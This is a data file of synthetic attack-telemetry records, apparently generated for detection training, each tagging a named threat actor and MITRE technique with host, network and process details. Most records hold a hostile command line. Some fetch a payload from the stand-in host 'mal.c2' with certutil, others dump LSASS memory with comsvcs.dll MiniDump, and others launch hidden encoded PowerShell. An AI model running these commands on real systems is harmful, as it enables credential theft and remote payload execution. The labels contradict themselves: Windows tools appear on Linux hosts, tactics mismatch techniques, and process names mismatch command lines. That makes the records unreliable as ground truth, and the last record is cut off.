{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1566.001 using encrypted C2 technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Credential Access"],"technique_id":"T1566.001"},"event_id":"evt_apt41_20260609T074854000Z_0016895","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["Fileless","WMI","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.229.197.33","name":"IAM-ROLE-FPV9DX2PS9","os":"Amazon Linux 2"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"16895APT41T1566.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.80.61.99","dst_port":5985,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"wmic.exe","parent_name":"services.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2025-03-27T02:39:58.000Z","user":{"name":"svc_t2t9o825armc","sid":"S-1-5-21-523331621-104781410-6947"}}
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1003.001 using fileless technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Impact","Initial Access"],"technique_id":"T1003.001"},"event_id":"evt_fin7_20260418T153011000Z_0016897","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["Fileless","LOLBin","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.102.63.29","name":"IAM-ROLE-5XJUDFXHX0","os":"Amazon Linux 2"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"16897FIN7T1003.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.150.160.35","dst_port":3389,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"rundll32.exe","parent_name":"svchost.exe"},"source":"Network Connection (DS0029)","timestamp":"2026-01-26T20:12:16.000Z","user":{"name":"svc_7qyqwgfrfb6e","sid":"S-1-5-21-561195377-568883212-7070"}}
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1021.006 using fileless technique.","sub_technique":"Windows Remote Management","tactic":["Reconnaissance"],"technique_id":"T1021.006"},"event_id":"evt_unc4841_20251015T032356000Z_0016899","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["LOLBin","Fileless","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.180.199.235","name":"APP-WEB-6JU0WN48ZF","os":"Amazon Linux 2"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"16899UNC4841T1021.006"},"network":{"domain":"update.microsoft.com","dst_ip":"1.181.179.10","dst_port":5985,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"rundll32.exe","parent_name":"explorer.exe"},"source":"CloudTrail (DS0028)","timestamp":"2026-02-18T13:04:44.000Z","user":{"name":"svc_u5hjwmnd5uac","sid":"S-1-5-21-841541372-160555641-2763"}}
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1570 using LOLBin technique.","sub_technique":"Lateral Tool Transfer","tactic":["Defense Evasion","Reconnaissance"],"technique_id":"T1570"},"event_id":"evt_apt29_20250114T152404000Z_0016901","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","LOLBin","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.158.225.138","name":"IAM-ROLE-8FF5GIQCGK","os":"Windows Server 2022"},"impact":{"business_risk":"Long-term persistence achieved","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"16901APT29T1570"},"network":{"domain":"update.microsoft.com","dst_ip":"1.62.26.223","dst_port":443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"wmic.exe","parent_name":"svchost.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-04-03T00:48:41.000Z","user":{"name":"azuread\\24stxgdlx6uc","sid":"S-1-5-21-780809239-864929957-3530"}}
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1059.001 using LOLBin technique.","sub_technique":"PowerShell","tactic":["Defense Evasion"],"technique_id":"T1059.001"},"event_id":"evt_apt29_20260929T164233000Z_0016903","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["TLS","Base64","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.120.191.39","name":"AZURE-VM-TCOHUH3HL7","os":"Windows Server 2022"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"16903APT29T1059.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.85.33.226","dst_port":443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"bitsadmin.exe","parent_name":"explorer.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2026-10-10T19:09:32.000Z","user":{"name":"arn:aws:iam::ra7bl9857rnb","sid":"S-1-5-21-191628917-570934680-2946"}}
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1566.001 using LOLBin technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Exfiltration","Reconnaissance"],"technique_id":"T1566.001"},"event_id":"evt_fin7_20251203T054650000Z_0016905","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["Base64","LOLBin","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.128.144.51","name":"IAM-ROLE-7E5NLQYAVB","os":"Amazon Linux 2"},"impact":{"business_risk":"Long-term persistence achieved","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"16905FIN7T1566.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.147.217.80","dst_port":445,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2134 C:\\temp\\lsass.dmp full","name":"powershell.exe","parent_name":"winlogon.exe"},"source":"Sysmon (DS0024)","timestamp":"2025-11-27T01:02:29.000Z","user":{"name":"i-vnhloiqacfie","sid":"S-1-5-21-613255759-393720792-7570"}}
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1566.001 using encrypted C2 technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Execution"],"technique_id":"T1566.001"},"event_id":"evt_mustangpanda_20261124T220937000Z_0016907","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["Base64","JA3 Spoof","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.57.236.46","name":"EC2-INST-65QGYBTFY6","os":"Windows Server 2022"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"16907Mustang PandaT1566.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.195.76.25","dst_port":8443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2145 C:\\temp\\lsass.dmp full","name":"mshta.exe","parent_name":"explorer.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-07-28T23:29:48.000Z","user":{"name":"i-vaehf3qrfdhx","sid":"S-1-5-21-114598740-113422355-4168"}}
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1098.004 using fileless technique.","sub_technique":"SSH Authorized Keys","tactic":["Defense Evasion"],"technique_id":"T1098.004"},"event_id":"evt_unc4841_20261003T084936000Z_0016909","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["LOLBin","TLS","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.112.33.246","name":"EC2-INST-MZ385TUGNL","os":"Amazon Linux 2"},"impact":{"business_risk":"Domain dominance","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"16909UNC4841T1098.004"},"network":{"domain":"update.microsoft.com","dst_ip":"1.19.88.6","dst_port":443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3308 C:\\temp\\lsass.dmp full","name":"mshta.exe","parent_name":"explorer.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2025-05-06T10:27:23.000Z","user":{"name":"svc_uflbcm6lapcu","sid":"S-1-5-21-786791121-392047244-3084"}}
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1531 using cloud-native technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Execution","Discovery","Impact"],"technique_id":"T1531"},"event_id":"evt_apt41_20251112T121351000Z_0016911","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["Base64","TLS","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.248.13.165","name":"IAM-ROLE-2UO1LP5L4V","os":"Ubuntu 22.04"},"impact":{"business_risk":"Cloud environment takeover","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"16911APT41T1531"},"network":{"domain":"aws.amazon.com","dst_ip":"1.138.234.23","dst_port":5985,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3218 C:\\temp\\lsass.dmp full","name":"mshta.exe","parent_name":"svchost.exe"},"source":"CloudTrail (DS0028)","timestamp":"2026-03-05T08:11:52.000Z","user":{"name":"CORP\\j1x4jvvmpkdc","sid":"S-1-5-21-188457814-566005303-4070"}}
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1566.001 using LOLBin technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Impact","Execution","Discovery"],"technique_id":"T1566.001"},"event_id":"evt_lapsus_20260330T060147000Z_0016913","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["Base64","WMI","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.75.61.21","name":"WIN-FIN-SRV-F9SRPBAWOK","os":"Amazon Linux 2"},"impact":{"business_risk":"Cloud environment takeover","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"16913Lapsus$T1566.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.22.75.184","dst_port":8443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"wmic.exe","parent_name":"services.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2026-12-21T04:55:17.000Z","user":{"name":"azuread\\8utljj76nvcw","sid":"S-1-5-21-966796484-624615972-6719"}}
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1570 using cloud-native technique.","sub_technique":"Lateral Tool Transfer","tactic":["Exfiltration","Collection","Lateral Movement"],"technique_id":"T1570"},"event_id":"evt_lapsus_20260430T111454000Z_0016915","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["WMI","Fileless","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.83.195.224","name":"EC2-INST-CELC1F59FP","os":"Amazon Linux 2"},"impact":{"business_risk":"Domain dominance","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"16915Lapsus$T1570"},"network":{"domain":"update.microsoft.com","dst_ip":"1.94.117.81","dst_port":445,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1770 C:\\temp\\lsass.dmp full","name":"mshta.exe","parent_name":"winlogon.exe"},"source":"Network Connection (DS0029)","timestamp":"2026-05-17T15:34:56.000Z","user":{"name":"arn:aws:iam::622v7k6rjny6","sid":"S-1-5-21-457879493-735031402-8439"}}
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1071.001 using LOLBin technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Credential Access","Reconnaissance","Exfiltration"],"technique_id":"T1071.001"},"event_id":"evt_unc4841_20250804T080916000Z_0016917","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["TLS","JA3 Spoof","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.75.198.232","name":"DB-ORACLE-LZSBHKGFBR","os":"Amazon Linux 2"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"16917UNC4841T1071.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.25.70.169","dst_port":8443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"wmic.exe","parent_name":"explorer.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-02-14T18:42:56.000Z","user":{"name":"i-6ztyiavjz21t","sid":"S-1-5-21-951001097-662237255-3960"}}
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1071.001 using fileless technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Execution","Reconnaissance"],"technique_id":"T1071.001"},"event_id":"evt_fin7_20260430T215311000Z_0016919","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["TLS","JA3 Spoof","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.147.250.30","name":"DB-ORACLE-WWE5ZTUEJX","os":"Windows Server 2022"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"16919FIN7T1071.001"},"network":{"domain":"github.com","dst_ip":"1.45.130.165","dst_port":8443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2484 C:\\temp\\lsass.dmp full","name":"powershell.exe","parent_name":"services.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-01-17T08:50:22.000Z","user":{"name":"arn:aws:iam::j17g35cevm2c","sid":"S-1-5-21-354272049-866322742-7130"}}
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1098.004 using fileless technique.","sub_technique":"SSH Authorized Keys","tactic":["Reconnaissance"],"technique_id":"T1098.004"},"event_id":"evt_fin7_20260712T092833000Z_0016921","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["LOLBin","WMI","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.75.29.220","name":"APP-WEB-CQQTX9SIBW","os":"Amazon Linux 2"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"16921FIN7T1098.004"},"network":{"domain":"aws.amazon.com","dst_ip":"1.103.222.29","dst_port":8443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"cmstp.exe","parent_name":"winlogon.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-03-30T18:18:22.000Z","user":{"name":"CORP\\7sntmypi8d3l","sid":"S-1-5-21-792613191-684865645-3721"}}
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1566.001 using fileless technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Execution"],"technique_id":"T1566.001"},"event_id":"evt_lapsus_20250817T050120000Z_0016923","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["Base64","TLS","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.140.108.107","name":"WIN-FIN-SRV-E7U6OYUNE9","os":"Windows Server 2022"},"impact":{"business_risk":"Cloud environment takeover","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"16923Lapsus$T1566.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.46.252.29","dst_port":8443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1814 C:\\temp\\lsass.dmp full","name":"powershell.exe","parent_name":"svchost.exe"},"source":"Network Connection (DS0029)","timestamp":"2026-09-17T10:53:26.000Z","user":{"name":"arn:aws:iam::1115uzbx9jc9","sid":"S-1-5-21-233586624-968495988-5175"}}
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1059.001 using cloud-native technique.","sub_technique":"PowerShell","tactic":["Collection","Initial Access","Persistence"],"technique_id":"T1059.001"},"event_id":"evt_apt41_20260926T190914000Z_0016925","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["LOLBin","JA3 Spoof","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.171.9.160","name":"IAM-ROLE-Y28ODB79CD","os":"Ubuntu 22.04"},"impact":{"business_risk":"Cloud environment takeover","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"16925APT41T1059.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.34.112.63","dst_port":8443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"mshta.exe","parent_name":"explorer.exe"},"source":"CloudTrail (DS0028)","timestamp":"2025-03-30T08:08:16.000Z","user":{"name":"arn:aws:iam::m1jp43bz6hc3","sid":"S-1-5-21-543049422-884796942-7019"}}
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1059.001 using cloud-native technique.","sub_technique":"PowerShell","tactic":["Collection","Lateral Movement"],"technique_id":"T1059.001"},"event_id":"evt_volttyphoon_20260906T112000000Z_0016927","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["Fileless","JA3 Spoof","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.82.162.140","name":"DB-ORACLE-9ABIZD97S6","os":"Amazon Linux 2"},"impact":{"business_risk":"Long-term persistence achieved","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"16927Volt TyphoonT1059.001"},"network":{"domain":"github.com","dst_ip":"1.156.200.61","dst_port":443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2276 C:\\temp\\lsass.dmp full","name":"cmstp.exe","parent_name":"services.exe"},"source":"CloudTrail (DS0028)","timestamp":"2026-04-24T09:00:37.000Z","user":{"name":"CORP\\9d7mm9ajfz0m","sid":"S-1-5-21-370094327-479428496-6851"}}
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1570 using LOLBin technique.","sub_technique":"Lateral Tool Transfer","tactic":["Command and Control"],"technique_id":"T1570"},"event_id":"evt_volttyphoon_20250628T201146000Z_0016929","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["LOLBin","JA3 Spoof","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.172.132.101","name":"DB-ORACLE-ADX06BFHSO","os":"Windows Server 2022"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"16929Volt TyphoonT1570"},"network":{"domain":"update.microsoft.com","dst_ip":"1.175.85.197","dst_port":3389,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"certutil.exe","parent_name":"winlogon.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2025-03-18T11:37:19.000Z","user":{"name":"CORP\\sp71n6752leg","sid":"S-1-5-21-238075622-454775789-9033"}}
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1071.001 using fileless technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Reconnaissance"],"technique_id":"T1071.001"},"event_id":"evt_apt41_20250530T134338000Z_0016931","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["TLS","LOLBin","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.161.239.102","name":"AZURE-VM-QRCHZY7M09","os":"Windows 11"},"impact":{"business_risk":"Cloud environment takeover","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"16931APT41T1071.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.13.6.52","dst_port":8443,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1838 C:\\temp\\lsass.dmp full","name":"cmstp.exe","parent_name":"winlogon.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-09-04T20:37:26.000Z","user":{"name":"arn:aws:iam::n51rmk8yzgcp","sid":"S-1-5-21-808451778-947811521-3277"}}
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1570 using fileless technique.","sub_technique":"Lateral Tool Transfer","tactic":["Initial Access","Execution","Discovery"],"technique_id":"T1570"},"event_id":"evt_apt41_20250426T181019000Z_0016933","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["TLS","JA3 Spoof","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.139.231.100","name":"EC2-INST-HW123W3WRC","os":"Windows Server 2022"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"16933APT41T1570"},"network":{"domain":"update.microsoft.com","dst_ip":"1.184.16.198","dst_port":445,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"rundll32.exe","parent_name":"explorer.exe"},"source":"Sysmon (DS0024)","timestamp":"2025-06-08T01:50:23.000Z","user":{"name":"i-6sozpyvy7kcc","sid":"S-1-5-21-158887588-502684262-1608"}}
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1059.001 using encrypted C2 technique.","sub_technique":"PowerShell","tactic":["Command and Control","Persistence","Credential Access"],"technique_id":"T1059.001"},"event_id":"evt_scatteredspider_20251109T195909000Z_0016935","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["TLS","WMI","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.68.22.211","name":"DB-ORACLE-DN64C3MDI7","os":"Ubuntu 22.04"},"impact":{"business_risk":"Long-term persistence achieved","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"16935Scattered SpiderT1059.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.180.64.45","dst_port":8443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"wmic.exe","parent_name":"explorer.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-11-19T00:13:08.000Z","user":{"name":"azuread\\3bdrq4bwrl8a","sid":"S-1-5-21-542468796-517534647-9555"}}
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1546.003 using fileless technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Collection"],"technique_id":"T1546.003"},"event_id":"evt_apt41_20260806T173239000Z_0016937","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["Base64","Fileless","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.12.246.223","name":"IAM-ROLE-DB3O1KHI44","os":"Windows Server 2022"},"impact":{"business_risk":"Cloud environment takeover","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"16937APT41T1546.003"},"network":{"domain":"cdn-content.com","dst_ip":"1.80.47.203","dst_port":3389,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"certutil.exe","parent_name":"explorer.exe"},"source":"CloudTrail (DS0028)","timestamp":"2025-02-06T01:39:06.000Z","user":{"name":"azuread\\9hwo25mdsjmq","sid":"S-1-5-21-227768880-438250851-9365"}}
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1570 using cloud-native technique.","sub_technique":"Lateral Tool Transfer","tactic":["Collection","Privilege Escalation"],"technique_id":"T1570"},"event_id":"evt_volttyphoon_20261012T222204000Z_0016939","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["LOLBin","Base64","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.4.71.3","name":"APP-WEB-XS0ABLUJVS","os":"Windows 11"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"16939Volt TyphoonT1570"},"network":{"domain":"github.com","dst_ip":"1.123.26.103","dst_port":8443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1191 C:\\temp\\lsass.dmp full","name":"powershell.exe","parent_name":"explorer.exe"},"source":"Windows Security Log","timestamp":"2025-10-14T03:14:49.000Z","user":{"name":"azuread\\924ikk0ra8t9","sid":"S-1-5-21-747828294-302277906-6876"}}
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1484.001 using LOLBin technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Reconnaissance","Privilege Escalation"],"technique_id":"T1484.001"},"event_id":"evt_scatteredspider_20250716T014815000Z_0016941","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","Base64","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.40.250.83","name":"APP-WEB-CB8FC50PEJ","os":"Amazon Linux 2"},"impact":{"business_risk":"Domain dominance","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"16941Scattered SpiderT1484.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.155.227.20","dst_port":5985,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2443 C:\\temp\\lsass.dmp full","name":"powershell.exe","parent_name":"services.exe"},"source":"Azure AD Sign-in 